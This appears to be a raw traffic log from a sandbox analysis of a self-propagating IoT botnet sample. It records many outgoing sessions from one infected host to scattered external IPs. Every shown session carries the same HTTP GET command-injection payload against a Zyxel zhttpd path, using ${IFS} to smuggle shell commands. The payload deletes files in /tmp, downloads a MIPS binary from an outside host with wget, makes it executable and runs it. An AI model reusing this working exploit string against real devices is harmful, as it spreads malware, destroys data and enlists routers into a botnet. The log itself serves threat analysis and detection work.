                                        Mar 31, 2024 09:22:09.506582022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7159192.168.2.2342020175.172.116.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506625891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7160192.168.2.234891485.190.224.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506699085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7161192.168.2.2346934175.115.117.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506731033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7162192.168.2.2336808163.34.6.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506766081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7163192.168.2.2356408212.117.25.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506802082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7164192.168.2.2355550201.71.59.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506831884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7165192.168.2.235788281.192.185.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506886005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7166192.168.2.2334952203.201.14.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506932020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7167192.168.2.233285035.162.233.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.506973982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7168192.168.2.234563640.220.106.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507023096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7169192.168.2.233531096.234.185.114443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507091999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7170192.168.2.236084635.116.200.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507143974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7171192.168.2.2351526211.99.133.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507177114 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7172192.168.2.235097020.140.89.74443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507231951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7173192.168.2.2336794185.98.121.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507266998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7174192.168.2.235960077.117.246.147443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507313013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7175192.168.2.2354830136.18.85.222443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507359028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7176192.168.2.2341884210.174.24.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507394075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7177192.168.2.234060269.208.16.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507421017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7178192.168.2.2353154139.33.169.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507502079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7179192.168.2.2348672212.246.87.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507549047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7180192.168.2.23570689.1.221.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507606030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7181192.168.2.2349232207.130.70.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507643938 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7182192.168.2.2340100169.150.124.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507684946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7183192.168.2.235989470.138.77.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507723093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7184192.168.2.2348198100.129.211.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507778883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7185192.168.2.235293232.222.199.148443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507803917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7186192.168.2.234586437.168.85.118443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507863998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7187192.168.2.2344400207.110.155.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507915974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7188192.168.2.235346834.205.32.3443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.507945061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7189192.168.2.233292071.172.183.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508001089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7190192.168.2.2358878129.47.105.221443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508047104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7191192.168.2.236019490.88.41.37443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508080006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7192192.168.2.234488450.43.130.254443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508147955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7193192.168.2.2359756144.247.174.132443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508192062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7194192.168.2.235634853.230.92.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508229017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7195192.168.2.2358190161.161.219.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508297920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7196192.168.2.2350838179.36.221.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508332968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7197192.168.2.2339518161.159.70.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508387089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7198192.168.2.236008651.225.155.45443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508420944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7199192.168.2.2349568160.253.98.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508466959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7200192.168.2.2338792124.0.157.122443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508503914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7201192.168.2.234478646.198.67.143443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508549929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7202192.168.2.2344894183.158.154.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508588076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7203192.168.2.233992043.66.127.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508635044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7204192.168.2.2335888220.72.223.138443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508698940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7205192.168.2.235451847.107.232.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508734941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7206192.168.2.234042688.112.165.49443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508785009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7207192.168.2.2349268130.129.210.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508836031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7208192.168.2.2335868147.251.228.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508868933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7209192.168.2.2353916131.220.0.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508925915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7210192.168.2.23378968.200.20.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.508960962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7211192.168.2.234100436.8.121.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509016037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7212192.168.2.235746683.222.30.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509059906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7213192.168.2.2355042188.85.160.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509110928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7214192.168.2.233483865.223.138.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509167910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7215192.168.2.236046064.5.205.169443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509238958 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7216192.168.2.234477649.109.22.165443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509283066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7217192.168.2.2339056177.85.106.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509330988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7218192.168.2.2353072115.222.106.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509376049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7219192.168.2.233531492.39.73.63443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509424925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7220192.168.2.235480444.44.6.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509473085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7221192.168.2.234749841.24.54.51443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509510040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7222192.168.2.2342704203.114.12.104443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509541988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7223192.168.2.235684851.81.61.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509584904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7224192.168.2.2359464168.75.27.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509668112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7225192.168.2.2337408184.94.50.218443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:09.509701014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        7226192.168.2.236046282.209.235.205443
                                        TimestampBytes transferredDirectionData
